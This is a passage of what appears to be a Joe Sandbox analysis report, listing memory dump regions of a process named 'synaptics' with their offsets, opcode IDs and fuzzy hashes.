                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CAE0000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAE0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6cae0000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 007e0173eb202844f79421ca435004fdf450c5e578dbc508b2bbcde1c0af8943
                                                                                                                                                                                                                                    • Instruction ID: 339e3b327aa97dfcb17ebf21dd61194615e7050007b5d46ca6b3b0ef8edc43e7
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 007e0173eb202844f79421ca435004fdf450c5e578dbc508b2bbcde1c0af8943
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C6017C71A043049BD710DF29D8017AABBE8EBC8228F04461EFD5887780E7B1A9498BC2
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CAF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAF1000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6caf1000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 9b0c551f0f956b955b8cfb9bacece0d7a4ee6020a3340220a83247fc6ec4106e
                                                                                                                                                                                                                                    • Instruction ID: f4c543e23de827c990a01b5a97705b33232464b01f0e836b7cb3ed27ef35a7ab
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9b0c551f0f956b955b8cfb9bacece0d7a4ee6020a3340220a83247fc6ec4106e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 300131357051049FD704CF5DE5908AAB7E5EF89228B1482AEED1D8B702EA32ED47CB90
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CAE0000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAE0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6cae0000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 31cb113cccaec3eed469844afec0f25870aa192145ce0de97f6da76315546344
                                                                                                                                                                                                                                    • Instruction ID: b4369f7a57200581e5159086f03d2c2dda7927ff20dc46dd439bdec6d4a0adc1
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 31cb113cccaec3eed469844afec0f25870aa192145ce0de97f6da76315546344
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 45F02B7520110427C600E9C49D61E9B7719D74A31CB144D54FD48DBE21E322EC8753C1
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CA2D000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA2D000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6ca2d000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: a1aa199cd7c4ca1d3f438cd1e2c87b648b43b202bd3e7d8df8eede404a1ed861
                                                                                                                                                                                                                                    • Instruction ID: 75f26c1ae89b0cc08e584a3e3f8f36f14a7a8440b9053275c256c54d9c657a9c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a1aa199cd7c4ca1d3f438cd1e2c87b648b43b202bd3e7d8df8eede404a1ed861
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FEF0C872B01A1097D7008FBDBC40555FB95EBC6239B148336DD3CC1AE1D7369865C6D1
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CA98000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA98000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6ca98000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 60b0cc5e275cbcc2c5362db9ff41a258b63ed4bc344413ac76f82752dc7f3ec4
                                                                                                                                                                                                                                    • Instruction ID: f1bbc74de3d2b373d3da337f7f870cb8331fde51f8e52ff888e447f9ab9dc062
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 60b0cc5e275cbcc2c5362db9ff41a258b63ed4bc344413ac76f82752dc7f3ec4
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 76F0FF363146018FD314CF29E14195573E4FB84375B15816BE55DCBBA1EB71E8818A14
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2120824900.000000006C7E8000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C7E8000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6c7e8000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 72f3f98077c44d283f7ddf77c465eb4cfaea76b2151f92884175059d935515ab
                                                                                                                                                                                                                                    • Instruction ID: 41c0f2e1f2551ed6fd87ce87580c76b58b1dc701f80beffbc3b81e75f3abe302
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 72f3f98077c44d283f7ddf77c465eb4cfaea76b2151f92884175059d935515ab
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5AF0E5A360611876F22162B61CC2FFF265CCFCBAA8F04042AFD04D2641F7958D0650FA
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CA72000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA72000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6ca72000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: cbb077cc0c8fa28c8e3fed601d9c09620671305b0f754b9a2f00da897f6c5525
                                                                                                                                                                                                                                    • Instruction ID: 3fa87109f792272990ba1581ca00826436270f20c26e1c7f789235e055b86b79
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cbb077cc0c8fa28c8e3fed601d9c09620671305b0f754b9a2f00da897f6c5525
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1CF097B6F0810062CA205EB87C1A7D1B79DCBC633CF084391AC1C5BFC0ED12694880E9
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CAF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAF1000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6caf1000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 1c08e87d3c145fc0400fcac3831c04a04bf4f84d76382902bae2d5649e78bd0e
                                                                                                                                                                                                                                    • Instruction ID: 2eeee22980cf2e6b571aeffab306aaf6ca2f8df8ebb50b5e67180270eacde1de
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1c08e87d3c145fc0400fcac3831c04a04bf4f84d76382902bae2d5649e78bd0e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3D11B3B5A047019FC354CF29D480A82F7E4FB8C314F10896EE9AD8B301EB31A946CFA1
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CAE0000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAE0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6cae0000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 7ef42c3ec01fcc3d16a4190b4f505e8539673dff1512a55eae93082322ab5f32
                                                                                                                                                                                                                                    • Instruction ID: 3c2b9f1f97bf61246557ffacf745c70160dd212e2da23009eca46bba53e9c59a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7ef42c3ec01fcc3d16a4190b4f505e8539673dff1512a55eae93082322ab5f32
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F301B6B6C0410DBBCF11DFC1DD45BEEBBBDAB08308F104695E91572610E77297689B91
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CB27000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CB27000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6cb27000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 282d5815385cb847855706a061499cdabc8754b155ef8a06f2c52ef264b42b16
                                                                                                                                                                                                                                    • Instruction ID: f10fe7b841c183dda09a56da46fba022ea9b19261063ff61ca341df9bfcb9ac7
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 282d5815385cb847855706a061499cdabc8754b155ef8a06f2c52ef264b42b16
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 41F0AFB1D057404BE7118A29D801B96B7A8AF61214F040129EC5C967A1EB70E698C7D3
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CB29000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CB29000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6cb29000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 36b9b67c5ae8f8a5681f6e24a829f8aa7a9c03fa0ecf10ebf46646f1dcbc17af
                                                                                                                                                                                                                                    • Instruction ID: aefbac5442c313cd0fac9b75914cc790db3c0fb16b231983eaeda48acf03da62
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 36b9b67c5ae8f8a5681f6e24a829f8aa7a9c03fa0ecf10ebf46646f1dcbc17af
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7BF0C8728087868BD3008F59D8012D6B3B1EF82338F14432DD8AC4B7A1D776E882CB82
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CA40000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6ca40000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 767a8840df449b6902a6e5d9ec68f5fd09d8edf31488de937fefa383a12a9607
                                                                                                                                                                                                                                    • Instruction ID: c74dd6e6252aae4eaa1f51a6b540599eda736898ffd68d912f436628df179204
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 767a8840df449b6902a6e5d9ec68f5fd09d8edf31488de937fefa383a12a9607
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3DE0E537B001241386005569AC004DB73AA8BD1275B18833AEA2D8B7C0DA75EC8BE7D1
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CB16000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CB16000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6cb16000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 9c84c13e09dac1ababeba7cae509da1502ab3050ade9e9963765e69a679e6e1d
                                                                                                                                                                                                                                    • Instruction ID: 7d0587c1329bce9ae19334924db7497c2f4a64164985c14a11584b08d8ce622c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9c84c13e09dac1ababeba7cae509da1502ab3050ade9e9963765e69a679e6e1d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B4E0D87764825117D514599AFC028CF3799CBC1379714033AE90D87B90EB56EE5BC3E2
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006C994000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C994000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6c994000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 94318d6b7036188bedf775cbdc48cda7d66426f925fcf6f50befdd37ba65d337
                                                                                                                                                                                                                                    • Instruction ID: 02220f85deffe7cee3d5f15d4e4e2282c2ce6fb243b743b733fb98c7bbf521ce
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 94318d6b7036188bedf775cbdc48cda7d66426f925fcf6f50befdd37ba65d337
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A8F0E930A042189BEB11ABA895057ED73A8DB1624CF004268DD0C57700DF74EE98CAD2
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CA98000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA98000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6ca98000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: d63a93283d37fbc441264c11ac00493a36db821715327cea5ac60b99123515a6
                                                                                                                                                                                                                                    • Instruction ID: bb33e23102b13ac85f4ffa988e18f9908ab0ae2d42bacc001f4c3fb760840bd3
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d63a93283d37fbc441264c11ac00493a36db821715327cea5ac60b99123515a6
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C0F030312187058FD714DF4AE48285BB3E9EB45364B54C41EE85EC7F11EB71F8808B94
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CAD5000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAD5000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6cad5000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 214c9fd6400132b8fc133e17707687f72db4aea207177d773b08b5f7e3c6d2bd
                                                                                                                                                                                                                                    • Instruction ID: 1d7ad76711acf8469e4f3335508a7a75d72264dc8cf0a5de8e3ad8352b916136
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 214c9fd6400132b8fc133e17707687f72db4aea207177d773b08b5f7e3c6d2bd
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 17F0FEB65082059FDB01CF55DC40B9BBBE9FB88328F10471AFD6891250E731D6698F52
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CAE0000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAE0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6cae0000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: f218f5309dd57fbcf3c8d401eb8d84f9918b66cb7e46c72dba32b3fa59c0f241
                                                                                                                                                                                                                                    • Instruction ID: 4bcd5e266c0c9f3d11cf475fd03a7f851287bd26651f8e84f3611c1ba5d2d785
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f218f5309dd57fbcf3c8d401eb8d84f9918b66cb7e46c72dba32b3fa59c0f241
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 36F01D72C003199BDF00DFA4D980ACDB7B8EB48354F144116D859BB640D7349A88CBD0
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CAE0000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAE0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6cae0000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 165c151804f5d2dc50b380f9e3d108259a0ff86fca68fb69ae611835c8077742
                                                                                                                                                                                                                                    • Instruction ID: c4933e0961f75b52913d7cd053a10e31a2f900f657c32d380dccb04fc03db016
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 165c151804f5d2dc50b380f9e3d108259a0ff86fca68fb69ae611835c8077742
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E6F030B6E042049FDB11CFA8D9908DEFBB2FF8D354B15452AD80467715DB31AC49DB90
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CB27000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CB27000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6cb27000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 8aaab6320d1de6ca650a70e44b83a21809041f7730c624a18f6fcb49e3116093
                                                                                                                                                                                                                                    • Instruction ID: c1fe9a749b70348e4943eee12d7e10b2e98b3920a3a69b2999bee26c794c8c70
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8aaab6320d1de6ca650a70e44b83a21809041f7730c624a18f6fcb49e3116093
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 36E0223270065187D3148E3DD800056F3A8EFC5374324072AC67C8BAD1DB75940B8785
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CA98000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA98000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6ca98000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 10946899265eae3a3525452477c6971ecdaa61c2271c7c54cefd9da88d2edf23
                                                                                                                                                                                                                                    • Instruction ID: 18b2e9d7cc2a06476004a01b386a81caff87d8771f9f3dc2a5ae19a4efc69d8d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 10946899265eae3a3525452477c6971ecdaa61c2271c7c54cefd9da88d2edf23
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2ED05E722052192B6B04596AEC814ABFB5CFE815B4316813EE809C3A10D661FC9142D0
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CAE0000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CAE0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6cae0000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 839bf5f7429b23621db0b2822a7f95ed147b09d7957033b0f08ba7b1cd509252
                                                                                                                                                                                                                                    • Instruction ID: 4ab3f210e17dfa876568c0ab356a75469185afe6a34addab79e3bf65e2f4d415
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 839bf5f7429b23621db0b2822a7f95ed147b09d7957033b0f08ba7b1cd509252
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FED05BB1A04146EA870096D55D41D56BA7BA79E314F0D951AF41251E01E5308C94D5F5
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2120824900.000000006C859000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C859000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6c859000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 7d6b999bfecec9f450146d5f2dbda57ea4f7d3c5e9abe8b38e1bede410c66d99
                                                                                                                                                                                                                                    • Instruction ID: df038dc32523b99d88c200a0e9c6a0c305491692194c09d5edc62401bd26af5f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7d6b999bfecec9f450146d5f2dbda57ea4f7d3c5e9abe8b38e1bede410c66d99
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4FD0A7B2458509950E709EE9FA41CF4335846013B87941F25A52895EC8CBE051B981A1
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006C9D2000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C9D2000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6c9d2000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 44a37dc07367374ec8cb6935195aeb013aab0f1ae6e5684210481c4ab58acfc5
                                                                                                                                                                                                                                    • Instruction ID: dc19244393d173f2e4fb6fd753ccb21f961d9941256aba0bc959e921ad1ae47c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 44a37dc07367374ec8cb6935195aeb013aab0f1ae6e5684210481c4ab58acfc5
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 45D0127650020CBBDF409E44DC41FE53BACDB04784F004016FE0C4A241E672E6A887D5
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2120824900.000000006C859000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C859000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6c859000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 4041014550e10bb6efbf460330e182fec7ccf90fff822f92aa6a8a990e343ba7
                                                                                                                                                                                                                                    • Instruction ID: cf49075dd1588dc115a1d3ed34cece63ed0c6de923b451e1015e0d768ec44e4e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4041014550e10bb6efbf460330e182fec7ccf90fff822f92aa6a8a990e343ba7
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FBC012B241851CE7CF415F859D009DD3B6A6B54354F44C425FA18049209776D175EF55
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CA08000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA08000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6ca08000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 7e822fbe9d1f11b53f5304286c0340139f6618348de3078cf5ecd27f9c499dbc
                                                                                                                                                                                                                                    • Instruction ID: 476e5d305894098aba883d3f76a4ee2da8b614ccc55c5110617827f6c420b61b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7e822fbe9d1f11b53f5304286c0340139f6618348de3078cf5ecd27f9c499dbc
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 61C012B520020D6BDF008E40EC42DD6336DA744618F008011FD0846750E671B999C690
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2146222081.000000006CA08000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA08000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6ca08000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 3dc8688c1de485e6c30ff9d0266e84612fcbc526e35f53cc88af90a1c73ce5c0
                                                                                                                                                                                                                                    • Instruction ID: 4e464467569ce3c644de5e2fb607b13c53c97e749cc0c2988cab65931b6b0c37
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3dc8688c1de485e6c30ff9d0266e84612fcbc526e35f53cc88af90a1c73ce5c0
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 46C012B520020D6BDF008E40EC42E96336DA744618F108011FD0846750E631B999C690
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000E.00000002.2120824900.000000006C859000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C859000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_6c859000_synaptics.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 3cdc5d02b04640048c8bb3ea80ee1f2143c3a0c13142e3196c759f1557a49f4b
                                                                                                                                                                                                                                    • Instruction ID: b2a34defecd6be95f962edc85ef15e10f4c22799796a00428cef51324d2b0396
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3cdc5d02b04640048c8bb3ea80ee1f2143c3a0c13142e3196c759f1557a49f4b
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 31B0928110B103282DA025B64B85AFA05940AED1DCBF00CAA6C32F0FA8EFC8C12A9039
                                                                                                                                                                                                                                    Memory Dump Source
